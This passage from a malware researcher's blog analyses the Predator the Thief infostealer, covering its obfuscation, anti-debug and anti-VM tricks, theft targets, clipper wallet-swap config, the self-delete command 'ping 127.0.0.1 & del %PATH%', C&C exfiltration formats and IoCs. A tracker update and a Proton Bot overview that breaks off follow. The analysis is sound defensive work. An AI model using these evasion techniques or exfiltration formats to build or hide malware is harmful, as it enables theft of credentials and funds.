Finally, the most common one, there is also the classic one used by using a for loop for a one key length XOR key, seen for decrypting modules, functions, and other thingsโฆ
str = ... # encrypted string for i, s in enumerate(str): s[i] = s[i] ^ s[len(str)-1]
Sub everything
Letโs consider this as a perfect example of โletโs do the same exact thing by just changing one single instructionโ, so in the end, a new encryption method is used with no effort for the development. Thatโs how a SUB instruction is used for doing the substitution cipher. The only difference that I could notice itโs how the key is retrieved.
Besides having something hardcoded directly, a signed 32-bit division is performed, easily noticeable by the use of cdq & idiv instructions, then the dl register (the remainder) is used for the substitution.
Stack Strings
Whatโs the result in the end?
Merging these obfuscation techniques leads to a nonsense amount of instructions for a basic task, which will obviously burn you some hours of analysis if you donโt take some time for cleaning a bit all that mess with the help of some scripts or plenty other ideas, that could trigger in your mind. It could be nice to see these days some scripts released by the community.

Simple tricks lead to nonsense code
Anti-Debug
There are plenty of techniques abused here that was not in the first analysis, this is not anymore a simple PEB.BeingDebugged or checking if you are running a virtual machine, so letโs dig into them. one per one except CheckRemoteDebugger! This one is enough to understand by itself :โ)
NtSetInformationThread
One of the oldest tricks in windows and still doing its work over the years. Basically in a very simple way (because there is a lot thing happening during the process), NtSetInformationThread is called with a value (0x11) obfuscated by a XOR operator. This parameter is a ThreadInformationClass with a specific enum called ThreadHideFromDebugger and when itโs executed, the debugger is not able to catch any debug information. So the supposed pointer to the corresponding thread is, of course, the malware and when you are analyzing it with a debugger, it will result to detach itself.
CloseHandle/NtClose
Inside WinMain, a huge function is called with a lot of consecutive anti-debug tricks, they were almost all indirectly related to some techniques patched by TitanHide (or strongly looks like), the first one performed is a really basic one, but pretty efficient to do the task.
Basically, when CloseHandle is called with an inexistent handle or an invalid one, it will raise an exception and whenever you have a debugger attached to the process, it will not like that at all. To guarantee that itโs not an issue for a normal interaction a simple __try / __except method is used, so if this API call is requested, it will safely lead to the end without any issue.
The invalid handle used here is a static one and itโs L33T code with the value 0xBAADAA55 and makes me bored as much as this face.
Thatโs not a surprise to see stuff like this from the malware developer. Inside jokes, l33t values, animes and probably other content that I missed are something usual to spot on Predator.
ProcessDebugObjectHandle
When you are debugging a process, Microsoft Windows is creating a โDebugโ object and a handle corresponding to it. At this point, when you want to check if this object exists on the process, NtQueryInformationProcess is used with the ProcessInfoClass initialized byย 0x1e (that is in fact, ProcessDebugObjectHandle).
In this case, the NTStatus value (returning result by the API call) is an error who as the ID 0xC0000353, aka STATUS_PORT_NOT_SET. This means, โAn attempt to remove a processโs DebugPort was made, but a port was not already associated with the process.โ. The anti-debug trick is to verify if this error is there, thatโs all.
NtGetContextThread
This one is maybe considered as pretty wild if you are not familiar with some hardware breakpoints. Basically, there are some registers that are called โDebug Registerโ and they are using the DRX nomenclatureย (DR0 to DR7). When GetThreadContext is called, the function will retrieve al the context information from a thread.
For those that are not familiar with a context structure, it contains all the register data from the corresponding element. So, with this data in possession, it only needs to check if those DRX registers are initiated with a value not equal to 0.
On the case here, itโs easily spottable to see that 4 registers are checked
if (ctx->Dr0 != 0 || ctx->Dr1 != 0 || ctx->Dr2 != 0 || ctx->Dr3 != 0)
Int 3 breakpoint
int 3 (or Interrupt 3) is a popular opcode to force the debugger to stop at a specific offset. As said in the title, this is a breakpoint but if itโs executed without any debugging environment, the exception handler is able to deal with this behavior and will continue to run without any issue. Unless I missed something, here is the scenario.
By the way,ย as another scenario used for this one (the int 3), the number of this specific opcode triggered could be also used as an incremented counter, if the counter is above a specific value, a simplistic condition is sufficient to check if itโs executed into a debugger in that way.
Debug Condition
With all the techniques explained above, in the end, they all lead to a final condition step if of course, the debugger hasnโt crashed. The checking task is pretty easy to understand and it remains to a simple operation: โsetting up a value to EAX during the anti-debug functionโ, if everything is correct this register will be set to zero, if not we could see all the different values that could be possible.

bloc in red is the correct condition over all the anti-debug tests
โฆAnd when the Anti-Debug function is done, the register EAX is checked by the test operator, so the ZF flag is determinant for entering into the most important loop that contains the main function of the stealer.
Anti-VM
The Anti VM is presented as an option in Predator and is performed just after the first C&C requests.
Tricks used are pretty olds and basically using Anti-VM Instructions
- SIDT
- SGDT
- STR
- CPUID (Hypervisor Trick)
By curiosity, this option is not by default performed if the C&C is not reachable.
Paranoid & Organized Predator
When entering into the โbig main functionโ, the stealer is doing โagainโ extra validations if you have a valid payload (and not a modded one), you are running it correctly and being sure again that you are not analyzing it.
This kind of paranoid checking step is a result of the multiple cases of cracked builders developed and released in the wild (mostly or exclusively at a time coming from XakFor.Net). Pretty wild and fun to see when Anti-Piracy protocols are also seen in the malware scape.
Then the malware is doing a classic organized setup to perform all the requested actions and could be represented in that way.
Of course as usual and already a bit explained in the first paper, the C&C domain is retrieved in a table of function pointers before the execution of the WinMain function (where the payload is starting to do tasks).
You can see easily all the functions that will be called based on the starting location (__xc_z) and the ending location (__xc_z).
Then you can spot easily the XOR strings that hide the C&C domain like the usual old predator malware.
Data Encryption & Encoding
Besides using XOR almost absolutely everywhere, this info stealer is using a mix of RC4 encryption and base64 encoding whenever it is receiving data from the C&C. Without using specialized tools or paid versions of IDA (or whatever other software), it could be a bit challenging to recognize it (when you are a junior analyst), due to some modification of some part of the code.
Base64
For the Base64 functions, itโs extremely easy to spot them, with the symbol values on the register before and after calls. The only thing to notice with them, itโs that they are using a typical signatureโฆ A whole bloc of XOR stack strings, I believed that this trick is designed to hide an eventual Base64 alphabet from some Yara rules.
By the way, the rest of the code remains identical to standard base64 algorithms.
RC4
For RC4, things could be a little bit messy if you are not familiar at all with encryption algorithm on a disassembler/debugger, for some cases it could be hell, for some case not. Here, itโs, in fact, this amount of code for performing the process.
Blocs are representing the Generation of the array S, then performing the Key-Scheduling Algorithm (KSA) by using a specific secret key that is, in fact, the C&C domain! (if there is no domain, but an IP hardcoded, this IP is the secret key), then the last one is the Pseudo-random generation algorithm (PRGA).
For more info, some resources about this algorithm below:
Mutex & Hardware ID
The Hardware ID (HWID) and mutex are related, and the generation is quite funky,ย I would say, even if most of the people will consider this as something not important to investigate, I love small details in malware, even if their role is maybe meaningless, but for me, every detail counts no matter what (even the stupidest one).
Here the hardware ID generation is split into 3 main parts. I had a lot of fun to understand how this one was created.
First, it will grab all the available logical drives on the compromised machine, and for each of them, the serial number is saved into a temporary variable. Then, whenever a new drive is found, the hexadecimal value is added to it. so basically if the two drives have the serial number โ44C5-F04Dโ and โ1130-DDFFโ, so ESI will receive 0x44C5F04D then will add 0x1130DFF.
When itโs done, this value is put into a while loop that will divide the value on ESI by 0xA and saved the remainder into another temporary variable, the loop condition breaks when ESI is below 1. Then the results of this operation are saved, duplicated and added to itself the last 4 bytes (i.e 1122334455 will be 112233445522334455).
If this is not sufficient, the value is put into another loop for performing this operation.
for i, s in enumerate(str): if i & 1: a += chr(s) + 0x40 else: a += chr(s)
It results in the creation of an alphanumeric string that will be the archive filename used during the POST request to the C&C.

the generated hardware ID based on the serial number devices
But wait! there is moreโฆ This value is in part of the creation of the mutex nameโฆ with a simple base64 operation on it and some bit operand operation for cutting part of the base64 encoding string for having finally the mutex name!
Anti-CIS
A classic thing in malware, this feature is used for avoiding infecting machines coming from the Commonwealth of Independent States (CIS) by using a simple API call GetUserDefaultLangID.
The value returned is the language identifier of the region format setting for the user and checked by a lot of specific language identifier, of courses in every situation, all the values that are tested, are encrypted.
Language ID | SubLanguage Symbol | Country |
0x0419 | SUBLANG_RUSSIAN_RUSSIA | Russia |
0x042b | SUBLANG_ARMENIAN_ARMENIA | Armenia |
0x082c | SUBLANG_AZERI_CYRILLIC | Azerbaijan |
0x042c | SUBLANG_AZERI_LATIN | Azerbaijan |
0x0423 | SUBLANG_BELARUSIAN_BELARUS | Belarus |
0x0437 | SUBLANG_GEORGIAN_GEORGIA | Georgia |
0x043f | SUBLANG_KAZAK_KAZAKHSTAN | Kazakhstan |
0x0428 | SUBLANG_TAJIK_TAJIKISTAN | Tajikistan |
0x0442 | SUBLANG_TURKMEN_TURKMENISTAN | Turkmenistan |
0x0843 | SUBLANG_UZBEK_CYRILLIC | Uzbekistan |
0x0443 | SUBLANG_UZBEK_LATIN | Uzbekistan |
0x0422 | SUBLANG_UKRAINIAN_UKRAINE | Ukraine |
Files, files where are you?
When I reversed for the first time this stealer, files and malicious archive were stored on the disk then deleted. But right now, this is not the case anymore. Predator is managing all the stolen data into memory for avoiding as much as possible any extra traces during the execution.
Predator is nowadays creating in memory a lot of allocated pages and temporary files that will be used for interactions with real files that exist on the disk. Most of the time itโs basically getting handles, size and doing some operation for opening, grabbing content and saving them to a place in memory. This explanation is summarized in a โveryโ simplify way because there are a lot of cases and scenarios to manage this.ย
Another point to notice is that the archive (using ZIP compression), is also created in memory by selecting folder/files.

The generated archive in memory
It doesnโt mean that the whole architecture for the files is different, itโs the same format as before.

an example of archive intercepted during the C&C Communication
Stealing
After explaining this many times about how this stuff, the fundamental idea is boringly the same for every stealer:
- Check
- Analyzing (optional)
- Parsing (optional)
- Copy
- Profit
- Repeat
What could be different behind that, is how they are obfuscating the files or values to checkโฆ and guess whatโฆ every malware has their specialties (whenever they are not decided to copy the same piece of code on Github or some whatever generic .NET stealer) and in the end, there is no black magic, just simple (or complex) enigma to solve. As a malware analyst, when you are starting into analyzing stealers, you want literally to understand everything, because everything is new, and with the time, you realized the routine performed to fetch the data and how stupid it is working well (as reminder, it might be not always that easy for some highly specific stuff).
In the end, you just want to know the targeted software, and only dig into those you havenโt seen before, but every time the thing is the same:
- Checking dumbly a path
- Checking a register key to have the correct path of a software
- Checking a shortcut path based on an icon
- etcโฆ
Beside that Predator the Thief is stealing a lot of different things:
- Grabbing content from Browsers (Cookies, History, Credentials)
- Harvesting/Fetching Credit Cards
- Stealing sensible information & files from Crypto-Wallets
- Credentials from FTP Software
- Data coming from Instant communication software
- Data coming from Messenger software
- 2FA Authenticator software
- Fetching Gaming accounts
- Credentials coming from VPN software
- Grabbing specific files (also dynamically)
- Harvesting all the information from the computer (Specs, Software)
- Stealing Clipboard (if during the execution of it, there is some content)
- Making a picture of yourself (if your webcam is connected)
- Making screenshot of your desktop
- It could also include a Clipper (as a modular feature).
- Andโฆ due to the module manager, other tasks that I still donโt have mentioned there (that also I donโt know who they are).
Letโs explain just some of them that I found worth to dig into.
Browsers
Since my last analysis, things changed for the browser part and itโs now divided into three major parts.
- Internet Explorer is analyzed in a specific function developed due that the data is contained into a โVaultโ, so it requires a specific Windows API to read it.
- Microsoft Edge is also split into another part of the stealing process due that this one is using unique files and needs some tasks for the parsing.
- Then, the other browsers are fetched by using a homemade static grabber
Grabber nยฐ1 (The generic one)
Itโs pretty fun to see that the stealing process is using at least one single function for catching a lot of things. This generic grabber is pretty โcleanedโ based on what I saw before even if there is no magic at all, itโs sufficient to make enough damages by using a recursive loop at a specific place that will search all the required files & folders.
By comparing older versions of predator, when it was attempting to steal content from browsers and some wallets, it was checking step by step specific repositories or registry keys then processing into some loops and tasks for fetching the credentials. Nowadays, this step has been removed (for the browser part) and being part of this raw grabber that will parse everything starting to %USERS% repository.
As usual, all the variables that contain required files are obfuscated and encrypted by a simple XOR algorithm and in the end, this is the โstaticโ list that the info stealer will be focused
File grabbed | Type | Actions |
Login Data | Chrome / Chromium based | Copy & Parse |
Cookies | Chrome / Chromium based | Copy & Parse |
Web Data | Browsers | Copy & Parse |
History | Browsers | Copy & Parse |
formhistory.sqlite | Mozilla Firefox & Others | Copy & Parse |
cookies.sqlite | Mozilla Firefox & Others | Copy & Parse |
wallet.dat | Bitcoin | Copy & Parse |
.sln | Visual Studio Projects | Copy filename into Project.txt |
main.db | Skype | Copy & Parse |
logins.json | Chrome | Copy & Parse |
signons.sqlite | Mozilla Firefox & Others | Copy & Parse |
places.sqlite | Mozilla Firefox & Others | Copy & Parse |
Last Version | Mozilla Firefox & Others | Copy & Parse |
Grabber nยฐ2 (The dynamic one)
There is a second grabber in Predator The Thief, and this not only used when there is available config loaded in memory based on the first request done to the C&C. In fact, itโs also used as part of the process of searching & copying critical files coming from wallets software, communication software, and othersโฆ
The โmain functionโ of this dynamic grabber only required three arguments:
- The path where you want to search files
- the requested file or mask
- A path where the found files will be put in the final archive sent to the C&C
When the grabber is configured for a recursive search, itโs simply adding at the end of the path the value โ..โ and checking if the next file is a folder to enter again into the same function again and again.
In the end, in the fundamentals, this is almost the same pattern as the first grabber with the only difference that in this case, there are no parsing/analyzing files in an in-depth way. Itโs simply this follow-up
- Find a matched file based on the requested search
- creating an entry on the stolen archive folder
- setting a handle/pointer from the grabbed file
- Save the whole content to memory
- Repeat
Of course, there is a lot of particular cases that are to take in consideration here, but the main idea is like this.
What Predator is stealing in the end?
If we removed the dynamic grabber, this is the current list (for 3.3.2) about what kind of software that is impacted by this stealer, for sure, itโs hard to know precisely on the browser all the one that is impacted due to the generic grabber, but in the end, the most important one is listed here.
VPN
- NordVPN
Communication
- Jabber
- Discord
- Skype
FTP
- WinSCP
- WinFTP
- FileZilla
Mails
- Outlook
2FA Software
- Authy (Inspired by Vidar)
Games
- Steam
- Battle.net (Inspired by Kpot)
- Osu
Wallets
- Electrum
- MultiBit
- Armory
- Ethereum
- Bytecoin
- Bitcoin
- Jaxx
- Atomic
- Exodus
Browser
- Mozilla Firefox (also Gecko browsers using same files)
- Chrome (also Chromium browsers using same files)
- Internet Explorer
- Edge
- Unmentioned browsers using the same files detected by the grabber.
Also beside stealing other actions are performed like:
- Performing a webcam picture capture
- Performing a desktop screenshot
Loader
There is currently 4 kind of loader implemented into this info stealer
- RunPE
- CreateProcess
- ShellExecuteA
- LoadPE
- LoadLibrary
For all the cases, I have explained below (on another part of this analysis) what are the options of each of the techniques performed. There is no magic, there is nothing to explain more about this feature these days. There are enough articles and tutorials that are talking about this. The only thing to notice is that Predator is designed to load the payload in different ways, just by a simple process creation or abusing some process injections (i recommend on this part, to read the work from endgame).
Module Manager
Something really interesting about this stealer these days, it that it developed a feature for being able to add the additional tasks as part of a module/plugin package. Maybe the name of this thing is wrongly named (i will probably be fixed soon about this statement). But now itโs definitely sure that we can consider this malware as a modular one.
When decrypting the config from check.get, you can understand fast that a module will be launched, by looking at the last entryโฆ
[PREDATOR_CONFIG]#[GRABBER]#[NETWORK_INFO]#[LOADER]#[example]
This will be the name of the module that will be requested to the C&C. (this is also the easiest way to spot a new module).
- example.get
- example.post
The first request is giving you the config of the module (on my case it was like this), itโs saved but NOT decrypted (looks like it will be dealt by the module on this part). The other request is focused on downloading the payload, decrypting it and saving it to the disk in a random folder in %PROGRAMDATA% (also the filename is generated also randomly), when itโs done, itโs simply executed by ShellExecuteA.
Also, another thing to notice, you know that itโs designed to launch multiple modules/plugins.
Clipper (Optional module)
The clipper is one example of the Module that could be loaded by the module manager. As far as I saw, I only see this one (maybe they are other things, maybe not, I donโt have the visibility for that).
Disclaimer: Before people will maybe mistaken, the clipper is proper to Predator the Thief and this is NOT something coming from another actor (if itโs the case, the loader part would be used).

Clipper WinMain function
This malware module is developed in C++, and like Predator itself, you recognized pretty well the obfuscation proper to it (Stack strings, XOR, SUB, Code spaghetti, GetProcAddress recreatedโฆ). Well, everything that you love for slowing down again your analysis.
As detailed already a little above, the module is designed to grab the config from the main program, decrypting it and starting to do the process routine indefinitely:
- Open Clipboard
- Checking content based on the config loaded
- If something matches put the malicious wallet
- Sleep
- Repeat
The clipper config is rudimentary using โ|โ as a delimiter. Mask/Regex on the left, malicious wallet on the right.
1*:1Eh8gHDVCS8xuKQNhCtZKiE1dVuRQiQ58H| 3*:1Eh8gHDVCS8xuKQNhCtZKiE1dVuRQiQ58H| 0x*:0x7996ad65556859C0F795Fe590018b08699092B9C| q*:qztrpt42h78ks7h6jlgtqtvhp3q6utm7sqrsupgwv0| G*:GaJvoTcC4Bw3kitxHWU4nrdDK3izXCTmFQ| X*:XruZmSaEYPX2mH48nGkPSGTzFiPfKXDLWn| L*:LdPvBrWvimse3WuVNg6pjH15GgBUtSUaWy| t*:t1dLgBbvV6sXNCMUSS5JeLjF4XhhbJYSDAe| 4*:44tLjmXrQNrWJ5NBsEj2R77ZBEgDa3fEe9GLpSf2FRmhexPvfYDUAB7EXX1Hdb3aMQ9FLqdJ56yaAhiXoRsceGJCRS3Jxkn| D*:DUMKwVVAaMcbtdWipMkXoGfRistK1cC26C| A*:AaUgfMh5iVkGKLVpMUZW8tGuyjZQNViwDt|
There is no communication with the C&C when the clipper is switching wallet, itโs an offline one.
Self Removal
When the parameters are set to 1 in the Predator config got by check.get, the malware is performing a really simple task to erase itself from the machine when all the tasks are done.
By looking at the bottom of the main big function where all the task is performed, you can see two main blocs that could be skipped. these two are huge stack strings that will generate two things.
- the API request โShellExecuteAโ
- The command โping 127.0.0.1 & del %PATH%โ
When all is prepared the thing is simply executed behind the classic register call. By the way, doing a ping request is one of the dozen way to do a sleep call and waiting for a little before performing the deletion.
This option is not performed by default when the malware is not able to get data from the C&C.
Telemetry files
There is a bunch of files that are proper to this stealer, which are generated during the whole infection process. Each of them has a specific meaning.
Information.txt
- Signature of the stealer
- Stealing statistics
- Computer specs
- Number of users in the machine
- List of logical drives
- Current usage resources
- Clipboard content
- Network info
- Compile-time of the payload
Also, this generated file is literally โhellโ when you want to dig into it by the amount of obfuscated code.
I can quote these following important telemetry files:
Software.txt
- Windows Build Version
- Generated User-Agent
- List of software installed in the machine (checking for x32 and x64 architecture folders)
Actions.txt
- List of actions & telemetry performed by the stealer itself during the stealing process
Projects.txt
- List of SLN filename found during the grabber research (the static one)
CookeList.txt
- List of cookies content fetched/parsed
Network
User-Agent โBuilderโ
Sometimes features are fun to dig in when I heard about that predator is now generating dynamic user-agent, I was thinking about some things but in fact, itโs way simpler than I thought.
The User-Agent is generated in 5 steps
- Decrypting a static string that contains the first part of the User-Agent
- Using GetTickCount and grabbing the last bytes of it for generating a fake builder version of Chrome
- Decrypting another static string that contains the end of the User-Agent
- Concat Everything
- Profit
Tihs User-Agent is shown into the software.txt logfile.
C&C Requests
There is currently 4 kind of request seen in Predator 3.3.2 (itโs always a POST request)
Request | Meaning |
api/check.get | Get dynamic config, tasks and network info |
api/gate.getย ?โฆโฆ | Send stolen data |
api/.get | Get modular dynamic config |
api/.post | Get modular dynamic payload (was like this with the clipper) |
The first step โ Get the config & extra Infos
For the first request, the response from the server is always in a specific form :
- String obviously base64 encoded
- Encrypted using RC4 encryption by using the domain name as the key
When decrypted, the config is pretty easy to guess and also a bit complex (due to the number of options & parameters that the threat actor is able to do).
[0;1;0;1;1;0;1;1;0;512;]#[[%userprofile%\Desktop|%userprofile%\Downloads|%userprofile%\Documents;*.xls,*.xlsx,*.doc,*.txt;128;;0]]#[Trakai;Republic of Lithuania;54.6378;24.9343;85.206.166.82;Europe/Vilnius;21001]#[]#[Clipper]
Itโs easily understandable that the config is split by the โ#โ and each data and could be summarized like this
- The stealer config
- The grabber config
- The network config
- The loader config
- The dynamic modular config (i.e Clipper)
I have represented each of them into an array with the meaning of each of the parameters (when it was possible).
Predator config
Args | Meaning |
Field 1 | Webcam screenshot |
Field 2 | Anti VM |
Field 3 | Skype |
Field 4 | Steam |
Field 5 | Desktop screenshot |
Field 6 | Anti-CIS |
Field 7 | Self Destroy |
Field 8 | Telegram |
Field 9 | Windows Cookie |
Field 10 | Max size for files grabbed |
Field 11 | Powershell script (in base64) |
Grabber config
[]#[GRABBER]#[]#[]#[]
Args | Meaning |
Field 1 | %PATH% using โ|โ as a delimiter |
Field 2 | Files to grab |
Field 3 | Max sized for each file grabbed |
Field 4 | Whitelist |
Field 5 | Recursive search (0 โ off | 1 โ on) |
Network info
[]#[]#[NETWORK]#[]#[]
Args | Meaning |
Field 1 | City |
Field 2 | Country |
Field 3 | GPS Coordinate |
Field 4 | Time Zone |
Field 5 | Postal Code |
Loader config
[]#[]#[]#[LOADER]#[]
Format
[[URL;3;2;;;;1;amazon.com;0;0;1;0;0;5]]
Meaning
- Loader URL
- Loader Type
- Architecture
- Targeted Countries (โ,โ as a delimiter)
- Blacklisted Countries (โ,โ as a delimiter)
- Arguments on startup
- Injected process OR Where itโs saved and executed
- Pushing loader if the specific domain(s) is(are) seen in the stolen data
- Pushing loader if wallets are presents
- Persistence
- Executing in admin mode
- Random file generated
- Repeating execution
- ???
Loader type (argument 2)
Value | Meaning |
1 | RunPE |
2 | CreateProcess |
3 | ShellExecute |
4 | LoadPE |
5 | LoadLibrary |
Architecture (argument 3)
Value | Meaning |
1 | x32 / x64 |
2 | x32 only |
3 | x64 only |
If itโs RunPE (argument 7)
Value | Meaning |
1 | Attrib.exe |
2 | Cmd.exe |
3 | Audiodg.exe |
If itโs CreateProcess / ShellExecuteA / LoadLibrary (argument 7)
Value | Meaning |
1 | %PROGRAMDATA% |
2 | %TEMP% |
3 | %APPDATA% |
The second step โ Sending stolen data
Format
/api/gate.get?p1=X&p2=X&p3=X&p4=X&p5=X&p6=X&p7=X&p8=X&p9=X&p10=X
Goal
- Sending stolen data
- Also victim telemetry
Meaning
Args | Field |
p1 | Passwords |
p2 | Cookies |
p3 | Credit Cards |
p4 | Forms |
p5 | Steam |
p6 | Wallets |
p7 | Telegram |
p8 | ??? |
p9 | ??? |
p10 | OS Version (encrypted + encoded)* |
This is an example of crafted request performed by Predator the thief
Third step โ Modular tasks (optional)
/api/Clipper.get
Give the dynamic clipper config
/api/Clipper.post
Give the predator clipper payload
Server side
The C&C is nowadays way different than the beginning, it has been reworked with some fancy designed and being able to do some stuff:
- Modulable C&C
- Classic fancy index with statistics
- Possibility to configure your panel itself
- Dynamic grabber configuration
- Telegram notifications
- Backups
- Tags for specific domains
Index
The predator panel changed a lot between the v2 and v3. This is currently a fancy theme one, and you can easily spot the whole statistics at first glance. the thing to notice is that the panel is fully in Russian (and I donโt know at that time if there is an English one).
Menu on the left is divide like this (but Iโm not really sure about the correct translation)
ะะตะฝั (Menu)
ะกัะฐัะธััะธะบะฐ (Stats)
- ะะพะณะพะฒ (Logs)
- ะะพ ัััะฐะฝะฐะผ (Country stats)
- ะะพะฐะดะตัะฐ (Loader Stats)
ะะพะณะธ (Logs)
- ะะฑััะฝะฐั
ะะพะดัะปะธ (Modules)
- ะะฐะณััะทะธัั ะผะพะดัะปั (Download/Upload Module)
ะะฐัััะพะนะบะธ (Settings)
- ะะฐัััะพะนะบะธ ัะฐะนัะฐ (Site settings)
- ะขะตะปะตะณัะฐะผ ะฑะพั (Telegram Bot)
- ะะพะฝัะธะณ (Config)
ะัะฐะฑะฑะตั (Grabber)
ะะพะฐะดะตั (Loader)
Domain Detect
Backup
ะะพะธัะบ (Search)
ะะพะฝะฒะตััะฐัะธั (Converter => Netscape Json converter)
Statistics / Landscape
Predator Config
In term of configuring predator, the choices are pretty wild:
- The actor is able to tweak its panel, by modifying some details, like the title and detail that made me laugh is you can choose a dark theme.
- There is also another form, the payload config is configured by just ticking options. When done, this will update the request coming from check.get
- As usual, there is also a telegram bot feature
Creating Tags for domains seen
Small details which were also mentioned in Vidar, but if the actor wants specific attention for bots that have data coming from specific domains, it will create a tag that will help him to filter easily which of them is probably worth to dig into.
Loader config
The loader configuration is by far really interesting in my point of view and even it has been explained totally for its functionalities, I considered it pretty complete and user-friendly for the Threat Actor that is using it.
IoCs
Hashes for this analysis
p_pckd.exe โ 21ebdc3a58f3d346247b2893d41c80126edabb060759af846273f9c9d0c92a9a
p_upkd.exe โ 6e27a2b223ef076d952aaa7c69725c831997898bebcd2d99654f4a1aa3358619
p_clipper.exe โ 01ef26b464faf08081fceeeb2cdff7a66ffdbd31072fe47b4eb43c219da287e8
C&C
- cadvexmail19mn.world
Other predator hashes
- 9110e59b6c7ced21e194d37bb4fc14b2
- 51e1924ac4c3f87553e9e9c712348ac8
- fe6125adb3cc69aa8c97ab31a0e7f5f8
- 02484e00e248da80c897e2261e65d275
- a86f18fa2d67415ac2d576e1cd5ccad8
- 3861a092245655330f0f1ffec75aca67
- ed3893c96decc3aa798be93192413d28
Conclusion
Infostealer is not considered as harmful as recent highly mediatize ransomware attacks, but they are enough effective to perform severe damage and they should not be underrated, furthermore, with the use of cryptocurrencies that are more and more common, or something totally normal nowadays, the lack of security hygiene on this subject is awfully insane. that I am not surprised at all to see so much money stolen, so they will be still really active, itโs always interesting to keep an eye on this malware family (and also on clippers), whenever there is a new wallet software or trading cryptocurrency software on the list, you know easily what are the possible trends (if you have a lack of knowledge in that area).
Nowadays, itโs easy to see fresh activities in the wild for this info stealer, it could be dropped by important malware campaigns where notorious malware like ISFB Gozi is also used. Itโs unnecessary (on my side) to speculate about what will be next move with Predator, I have clearly no idea and not interested in that kind of stuff. The thing is the malware scene nowadays is evolving really fast, threat actor teams are moving/switching easily and it could take only hours for new updates and rework of malware by just modifying a piece of code with something already developed on some GitHub repository, or copying code from another malware. Also, the price of the malware has been adjusted, or the support communication is moved to something else.
Due to this,ย I am pretty sure at that time, this current in-depth analysis could be already outdated by some modifications. itโs always a risk to take and on my side, I am only interested in the malware itself, the main ideas/facts of the major version are explained and itโs plenty sufficient. There is, of course, some topics that I havenโt talk like nowadays predator is now being to work as a classic executable file or a DLL, but it was developed some times ago and this subject is now a bit popular. Also, another point that I didnโt find any explanation, is that seeing some decrypting process for strings that leads to some encryption algorithm related to Tor.
This in-depth analysis is also focused on showing that even simple tricks are an efficient way to slow down analysis and it is a good exercise to practice your skills if you want to improve yourself into malware analysis. Also, reverse engineering is not as hard as people could think when the fundamental concepts are assimilated, Itโs just time, practice and motivation.
On my side, I am, as usual, typically irregular into releasing stuff due to some stuff (againโฆ). By the way, updating projects are still one of my main focus, I still have some things that I would love to finish which are not necessarily into malware analysis, itโs cool to change topics sometimes.
#HappyHunting
Haruko Malware Tracker โ 1 Year Anniversary Update
Hi folks,
Itโs been one year that the tracker (https://tracker.fumik0.com) is now active and over this past months, I understood that maintaining this solo project was definitely not an easy task. But, right now, Haruko is step by step a growing place that provides a start for OSINT stuff, learning Reverse malware analysis or helping some blue team people when they have to analyze some samples.
If I could summarize this malware tracker in one year:
- 2600+ Samples
- A learning tab with dozen of exercises added
- A malware tab with 40+ notes for quick tips with some malware implemented
- An Unlimited API
โฆ and this everything is free.
Itโs pretty obvious that some companies are grabbing some data from my project to resell them after without any credits, or changing the name of the sample by adding tags for other commercial bullshit nonsense to prove they are the first on it, Thatโs all part of the game, thatโs life.
At first, this tracker was created due, that a lot of people can even afford to have tools or services, for being able just to search, download, analyzed samples and improve their skills. This is a good start among other Free services to start your OSINT and learning some stuff. If this tracker is helping students, teachers to provide courses, helping Junior Analyst or just curious, thatโs the most important thing.
New section โ Wallet
Since some years right now, cryptocurrencies are now part of the cybercrime landscape, with more and more trends on it. So, For having an idea, which of them are used/abused by threat actors, it could be a good thing to centralized them.
API
/api/get-wallets /api/wallet/value
Why the idea of this branch?
- Plug the API into the step of the transaction, for a better security approach
- If a wallet is switched by a clipper, the API request is a way to check if, in the DB, this one is already known for some malicious activities and could be blocked easily.
New field โ Domain
For OSINT research, the field โdomainโ has been added
domain
On the website
Example in JSON format
{ย ย ย ย ย "first_seen":"2018-08-05", ย ย ย "first_seen_details":"1533469173", ย ย ย "hash":{ย ย ย ย ย ย ย ย "md5":"ca92b2a06320fa138989ead470e6b8f5", ย ย ย ย ย ย "sha1":"feb71e950f43eac5037def7513f7c4e5eb3d76cc", ย ย ย ย ย ย "sha256":"af2c63561aa10a1e444471706a5ea35f951795dff4bb1fc735fdf05c8f30b998" ย ย ย }, ย ย ย "hash_seen":1, ย ย ย "id":"5b66e1f5143e9a34ec8a3752", ย ย ย "sample":{ย ย ย ย ย ย ย ย "name":"jardata.exe", ย ย ย ย ย ย "size":"1102336" ย ย ย }, ย ย ย "server":{ย ย ย ย ย ย ย ย "AS":"AS16509", ย ย ย ย ย ย "country":"us", ย ย ย ย ย ย "domain":"bitbucket.org", ย ย ย ย ย ย "ip":"52.216.84.40", ย ย ย ย ย ย "url":"bitbucket.org/kent9876/test/downloads/jardata.exe" ย ย ย } }
Updates on API
I have made some little tweaks about the API possibilities, there is now some new ones available
/api/ip/value /api/domain/value /api/as/value /api/country/value /api/md5/value /api/sha256/value
What next?
I have some other things that I want to release before the end of this year (unrelated to this tracker), but not sure if I will have enough time to complete everything, but yes another content & ideas are coming.
If you want to participate in this project, contact me.
Fumi o/
Overview of Proton Bot, another loader in the wild!
Loaders nowadays are part of the malware landscape and it is common to see on sandbox logs results with โloaderโ tagged on. Specialized loader malware like Smoke or Hancitor/Chanitor are facing more and more with new alternatives like Godzilla loader, stealers, miners and plenty other kinds of malware with this developed feature as an option. This is easily catchable and already explained in earlier articles that I have made.
Since a few months, another dedicated loader malware appears from multiple sources with the name of โProton Botโ and on my side, first results were coming from a v0.30 version. For this article, the overview will focus on the latest one, the v1.
Sold 50$ (with C&C panel) and developed in C++, its cheaper than Smoke (usually seen with an average of 200$/300$) and could explain that some actors/customers are making some changes and trying new products to see if itโs worth to continue with it. The developer behind (glad0ff), is not as his first malware, he is also behind Acrux & Decrux.
[Disclamer: This article is not a deep in-depth analysis]
Analyzed sample
- 1AF50F81E46C8E8D49C44CB2765DD71A [Packed]
- 4C422E9D3331BD3F1BB785A1A4035BBD [Unpacked]
Something that I am finally glad by reversing this malware is that Iโm not in pain for unpacking a VM protected sample. By far this is the โonly oneโ that Iโve analyzed from this developer this is not usingย Themida, VMprotect or Enigma Protector.
So seeing finally a clean PE is some kind of heaven.
Behavior
When the malware is launched, itโs retrieving the full path of the executed module by calling GetModuleFilename, this returned value is the key for Proton Bot to verify if this, is a first-time interaction on the victim machine or in contrary an already setup and configured bot. The path is compared with a corresponding name & repository hardcoded into the code that are obviously obfuscated and encrypted.
This call is an alternative to GetCommandLineย on this case.
On this screenshot above, EDI contains the value of the payload executed at the current time and EAX, the final location. At that point with a lack of samples in my possession, I cannot confirm this path is unique for all Proton Bot v1 or multiple fields could be a possibility, this will be resolved when more samples will be available for analysisโฆ
